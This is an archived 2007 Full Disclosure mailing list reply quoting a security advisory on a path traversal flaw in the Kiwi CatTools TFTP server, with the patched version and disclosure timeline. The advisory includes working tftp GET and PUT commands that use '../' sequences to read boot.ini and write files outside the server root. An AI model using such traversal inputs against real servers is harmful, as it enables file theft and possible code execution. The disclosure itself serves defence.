Full Disclosure mailing list archives
Re: Kiwi CatTools TFTP server path traversal
From: 3APA3A <3APA3A () SECURITY NNOV RU>
Date: Tue, 27 Feb 2007 18:17:45 +0300
Probably, it's same or related issue for reported by nicob at nicob.net. http://securityvulns.com/news/KIWI/CatTools/DT.html CVE-2007-0888 --Wednesday, February 28, 2007, 12:47:17 AM, you wrote to bugtraq () securityfocus com: n> Path traversal security vulnerability in Kiwi CatTools TFTP up to 3.2.8 n> server can lead to information disclosure and remote code execution n> Risk: High n> DISCUSSION n> Kiwi CatTools TFTP server doesn't properly verify filename in PUT and GET n> request which can be used to download/upload any file from/to server. n> Default setting allows replacing of existing files. Such settings lead to n> probability to replace an executable files and run code on attacker choice. n> EXAMPLES C:\>>tftp -i 10.1.1.2 GET /x/../../../../../boot.ini boot.txt n> Transfer successful: 212 bytes in 1 second, 212 bytes/s C:\>>type boot.txt n> [boot loader] n> timeout=30 n> default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS C:\>>tftp -i 10.1.1.2 PUT boot.txt /x/../../../../../pttest.txt n> Transfer successful: 212 bytes in 1 second, 212 bytes/s C:\>>type pttest.txt n> [boot loader] n> timeout=30 n> default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS C:\>> n> SOLUTION n> Upgrade to CatTools 3.2.9 which is available for download at n> <http://www.kiwisyslog.com/downloads.php> n> http://www.kiwisyslog.com/downloads.php n> CREDITS n> Sergey Gordeychik of Positive Technologies (www.ptsecurity.com) n> DISCLOSURE TIMELINE n> Vulnerability discovered: 11/20/2006 n> Initial vendor contact: 12/08/2006 n> Patch released: 02/13/2007 n> Public disclosure: 02/27/2007 -- ~/ZARAZA http://securityvulns.com/ Пока вы во власти провидения, вам не удастся умереть раньше срока. (Твен) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Kiwi CatTools TFTP server path traversal noreply (Feb 27)
- Re: Kiwi CatTools TFTP server path traversal 3APA3A (Feb 27)